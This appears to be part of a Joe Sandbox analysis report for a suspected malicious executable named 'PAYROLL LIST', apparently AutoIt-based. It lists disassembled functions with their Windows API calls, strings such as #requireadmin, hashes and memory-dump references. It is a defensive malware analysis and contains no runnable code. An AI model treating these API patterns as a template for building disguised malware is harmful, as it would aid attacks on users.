Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9c15b7c919467ffda7eb25f3cf63715397cf3db7a2cefc7c45c5e9d681fd7351
Instruction ID: e88c0c2c0e72d61cedb2d0f24335c768620846ee4ec38d0fa3a3fb9aa811e0d8
Opcode Fuzzy Hash: 9c15b7c919467ffda7eb25f3cf63715397cf3db7a2cefc7c45c5e9d681fd7351
Instruction Fuzzy Hash: EF219576601219AFAB10DFA8CC88DAB77FCEB09360B008125F955DB291D774EC858B60

Function 00A62472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00A62485
__wcsnicmp.LIBCMT ref: 00A624A6
__wcsnicmp.LIBCMT ref: 00A624C0

Strings

#requireadmin, xrefs: 00A624A0
#notrayicon, xrefs: 00A6247D
#OnAutoItStartRegister, xrefs: 00A624BA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 12899aeccfbc42f1ee699751dbe3cacacd41f1f2627076dee621458582b671d6
Instruction ID: 595c1995837646035a5955b76d1e23112a7d91528aa97ecacd9c823358cac029
Opcode Fuzzy Hash: 12899aeccfbc42f1ee699751dbe3cacacd41f1f2627076dee621458582b671d6
Instruction Fuzzy Hash: 5A213B72684A11B7D330AB349D16FBB73B8EFA5310F50843AF44797182EB699982C395

Function 00A60986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A609CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A609F1
SysAllocString.OLEAUT32(00000000), ref: 00A609F4
SysAllocString.OLEAUT32 ref: 00A60A15
SysFreeString.OLEAUT32 ref: 00A60A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00A60A38
SysAllocString.OLEAUT32(?), ref: 00A60A46

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5ebceaf71470b108f8f20a630ea5f2b853b7e7bb67b51e613c1929ac66513b97
Instruction ID: 5657c954632c490e447370fe1f416cd8cc58d5adeca885ff97ca7c68b3f76f38
Opcode Fuzzy Hash: 5ebceaf71470b108f8f20a630ea5f2b853b7e7bb67b51e613c1929ac66513b97
Instruction Fuzzy Hash: 78216075604205AF9B10DBE8DC88DAB77FCEF193A07008125F949CB2A1E774EC818B64

Function 00A8A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A3D1BA
Part of subcall function 00A3D17C: GetStockObject.GDI32(00000011), ref: 00A3D1CE
Part of subcall function 00A3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A3D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A8A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A8A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A8A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A8A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A8A360

Strings

Msctls_Progress32, xrefs: 00A8A2FE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8754e61c7d07d014e00758a5aa51cbc81124fc967e21259e1a73dbc260f416b3
Instruction ID: 9ae8902b2f8acf0ee440358808e6d61707eac55a2c1273b5f49f19fc2a99dc0d
Opcode Fuzzy Hash: 8754e61c7d07d014e00758a5aa51cbc81124fc967e21259e1a73dbc260f416b3
Instruction Fuzzy Hash: 0C1181B1150119BEEF11AFA0CC85EEB7F6DFF09798F014115BA04A60A0C6729C21DBA4

Function 00A3CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00A3CCF6
GetWindowRect.USER32(?,?), ref: 00A3CD37
ScreenToClient.USER32(?,?), ref: 00A3CD5F
GetClientRect.USER32(?,?), ref: 00A3CE8C
GetWindowRect.USER32(?,?), ref: 00A3CEA5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7d157af1e49e44a7bdbbcbe1819b8874d174f46e593fe0593aaab45297f5098f
Instruction ID: 619b44f782fa2b46dbc243c49f910444e543c3d8ce45104cafcf69a92f46527c
Opcode Fuzzy Hash: 7d157af1e49e44a7bdbbcbe1819b8874d174f46e593fe0593aaab45297f5098f
Instruction Fuzzy Hash: AFB13B79A0024ADBDF10CFA8C9807EDBBB1FF08350F249529EC59EB255DB30A951DB64

Function 00A81BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A81C18
Process32FirstW.KERNEL32(00000000,?), ref: 00A81C26
__wsplitpath.LIBCMT ref: 00A81C54

Part of subcall function 00A41DFC: __wsplitpath_helper.LIBCMT ref: 00A41E3C

_wcscat.LIBCMT ref: 00A81C69
Process32NextW.KERNEL32(00000000,?), ref: 00A81CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00A81CF1

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: a98f6f489562c00f1e31873ce883024cf1a819f070928f491e8d8f5c9dc0db68
Instruction ID: 4a001e028a47127c55b7464881bc97a4a6b9425b9098f1f138137dfc65029be2
Opcode Fuzzy Hash: a98f6f489562c00f1e31873ce883024cf1a819f070928f491e8d8f5c9dc0db68
Instruction Fuzzy Hash: 6B516DB11043409FD720EF64D985EABB7ECEF88754F00492EF58A97291EB709A05CB92

Function 00A82FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A83C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A82BB5,?,?), ref: 00A83C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A830AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A830EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A83112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A8313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A8317E
RegCloseKey.ADVAPI32(00000000), ref: 00A8318B

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: bfde839e567baaa933c9d42636ab208d822509ad21a2ae6582f729d21f10b098
Instruction ID: c49b25e8b2d8b7009ce7e592df01d331d19db484bac19bf27339ea64ad9432ea
Opcode Fuzzy Hash: bfde839e567baaa933c9d42636ab208d822509ad21a2ae6582f729d21f10b098
Instruction Fuzzy Hash: CD512932104300AFCB04EF68C995E6ABBF9FF89710F04492DF59697191DB71EA15CB52

Function 00A884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A88540
GetMenuItemCount.USER32(00000000), ref: 00A88577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A8859F
GetMenuItemID.USER32(?,?), ref: 00A8860E
GetSubMenu.USER32(?,?), ref: 00A8861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A8866D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 8ed119b2919842b2bd3f6a096b7d8cad2658114662b34f95aff283e7b2f4f90a
Instruction ID: c7a4dd7e2b54cdfb118ac5d61a739d182f2074165a4103375c3b26cf08c24871
Opcode Fuzzy Hash: 8ed119b2919842b2bd3f6a096b7d8cad2658114662b34f95aff283e7b2f4f90a
Instruction Fuzzy Hash: 93518C75E00225AFCB15EFA8C941AAEB7F5BF48710F104469E916BB391DF34AE418B90

Function 00A64AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A64B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A64B5B
IsMenu.USER32(00000000), ref: 00A64B7B
CreatePopupMenu.USER32 ref: 00A64BAF
GetMenuItemCount.USER32(000000FF), ref: 00A64C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A64C3E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 4a50d1e38a0b723a240847233b3154da0c307bcdb4e6e47981a93594c20e9bf2
Instruction ID: c9cb730166f4ca0513e90f9ecbbb3467d5af8ac353970378ca4b1f4d898c20f6
Opcode Fuzzy Hash: 4a50d1e38a0b723a240847233b3154da0c307bcdb4e6e47981a93594c20e9bf2
Instruction Fuzzy Hash: 08510F70A0130AEFDF25CFA8C988BAEBBF4AF49318F148119E5659B390E370D944CB51

Function 00A78DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00A78E7C
WSAGetLastError.WSOCK32(00000000), ref: 00A78E89
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00A78EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00A78EC5
_strlen.LIBCMT ref: 00A78EF7
WSAGetLastError.WSOCK32(00000000), ref: 00A78F6A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 170e5ff80e2d2250102305303cc18d88bf3ca0cecfc203ee04f95e74891ffd81
Instruction ID: 03162f588bdf68f2d17b1c21f52d13764bf3abd8aae3a9fdc4e70a0d40c34ed6
Opcode Fuzzy Hash: 170e5ff80e2d2250102305303cc18d88bf3ca0cecfc203ee04f95e74891ffd81
Instruction Fuzzy Hash: C4419371500204AFCB18EBA8DE99EAEB7B9AF58310F10C569F51A972D1DF34DE40CB60

Function 00A3ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

BeginPaint.USER32(?,?,?), ref: 00A3AC2A
GetWindowRect.USER32(?,?), ref: 00A3AC8E
ScreenToClient.USER32(?,?), ref: 00A3ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A3ACBC
EndPaint.USER32(?,?,?,?,?), ref: 00A3AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A9E673

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: ce7be4e76ac1c74f8f9855e4b161be8c31ccc3a3c4584f0ca8239fb4870fe45b
Instruction ID: e8dbf7589dd47100001b7608dfe4360c4513cecbc5554448e917536faea814f0
Opcode Fuzzy Hash: ce7be4e76ac1c74f8f9855e4b161be8c31ccc3a3c4584f0ca8239fb4870fe45b
Instruction Fuzzy Hash: C641D2701042519FC710DFA8DC84FB67BF8EB69320F040629FAA58B2A1D7319845DB62

Function 00A8E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00AE1628,00000000,00AE1628,00000000,00000000,00AE1628,?,00A9DC5D,00000000,?,00000000,00000000,00000000,?,00A9DAD1,00000004), ref: 00A8E40B
EnableWindow.USER32(00000000,00000000), ref: 00A8E42F
ShowWindow.USER32(00AE1628,00000000), ref: 00A8E48F
ShowWindow.USER32(00000000,00000004), ref: 00A8E4A1
EnableWindow.USER32(00000000,00000001), ref: 00A8E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A8E4E8

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 048ba9c8833b324baad495b68fb5c08a3e52581305a2ba1411a947bd4f0e03d3
Instruction ID: 92bb393409e926695aa9db60f1bd3ac59891e8dc4183631811b539b79db385dc
Opcode Fuzzy Hash: 048ba9c8833b324baad495b68fb5c08a3e52581305a2ba1411a947bd4f0e03d3
Instruction Fuzzy Hash: 29416E30601141EFDB26DF68C599F947BE1BF0A304F1881A9EA5D8F2A2C732E846CB51

Function 00A698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A698D1

Part of subcall function 00A3F4EA: std::exception::exception.LIBCMT ref: 00A3F51E
Part of subcall function 00A3F4EA: __CxxThrowException@8.LIBCMT ref: 00A3F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A69908
EnterCriticalSection.KERNEL32(?), ref: 00A69924
LeaveCriticalSection.KERNEL32(?), ref: 00A6999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A699B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A699D2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 2f92b71476b6351f03adba654984e6fda9a532cc99f7f203b9b34c3b93a2fea7
Instruction ID: ec4816afd7466c11b63c3bc97f195b054dfcdf87772a8c955612998f2c4823fd
Opcode Fuzzy Hash: 2f92b71476b6351f03adba654984e6fda9a532cc99f7f203b9b34c3b93a2fea7
Instruction Fuzzy Hash: FF317032900205EFDB10DFA4DD85AABB778FF45710F1480A9F905AB296D734DA15CBA4

Function 00A79B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00A777F4,?,?,00000000,00000001), ref: 00A79B53

Part of subcall function 00A76544: GetWindowRect.USER32(?,?), ref: 00A76557

GetDesktopWindow.USER32 ref: 00A79B7D
GetWindowRect.USER32(00000000), ref: 00A79B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A79BB6

Part of subcall function 00A67A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A67AD0

GetCursorPos.USER32(?), ref: 00A79BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A79C44

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 99c64f24a9ae36bd2f4ff1cf524321f3c44d0393e87e679048780dc9f090ab5d
Instruction ID: 5a34085035006432853fb1e453b92ceb52bcc0333ea4f2edce8402b9c7193e60
Opcode Fuzzy Hash: 99c64f24a9ae36bd2f4ff1cf524321f3c44d0393e87e679048780dc9f090ab5d
Instruction Fuzzy Hash: 8031CC7250430AABD710DF58DC49B9BB7E9FF89314F00492AF589E7191DB31EA09CB92

Function 00A5AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A5AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00A5AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A5AFC4
CloseHandle.KERNEL32(00000004), ref: 00A5AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A5AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00A5B012

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f14dc545cc65b788546fa2da7513e61bc0f147a0228d835cc1d5fc693f80be7c
Instruction ID: 5f49b6a0207213effde41f8269bf00b163894c95c9a8105dad11799b0dd797e0
Opcode Fuzzy Hash: f14dc545cc65b788546fa2da7513e61bc0f147a0228d835cc1d5fc693f80be7c
Instruction Fuzzy Hash: BB214FB220020AAFDF01CF94DD09BAE7BA9BB45305F044115FD02A61A1C3769D19EB61

Function 00A8EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A3AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A3AFE3
Part of subcall function 00A3AF83: SelectObject.GDI32(?,00000000), ref: 00A3AFF2
Part of subcall function 00A3AF83: BeginPath.GDI32(?), ref: 00A3B009
Part of subcall function 00A3AF83: SelectObject.GDI32(?,00000000), ref: 00A3B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A8EC20
LineTo.GDI32(00000000,00000003,?), ref: 00A8EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A8EC42
LineTo.GDI32(00000000,00000000,?), ref: 00A8EC52
EndPath.GDI32(00000000), ref: 00A8EC62
StrokePath.GDI32(00000000), ref: 00A8EC72

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e95c1753f4ad25fbb915fe5a2048aaff58b5965f24f9c21e77114ce137f32580
Instruction ID: 056dd302fcc012e22c461471d7efdfa32561827cd314daaebbb6f67107f5e41d
Opcode Fuzzy Hash: e95c1753f4ad25fbb915fe5a2048aaff58b5965f24f9c21e77114ce137f32580
Instruction Fuzzy Hash: 4B111B7240015DBFEF02DF90DD88EEA7F6DEB09354F048112BE4A891A0D7719E56DBA0

Function 00A5E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A5E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A5E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A5E1D8
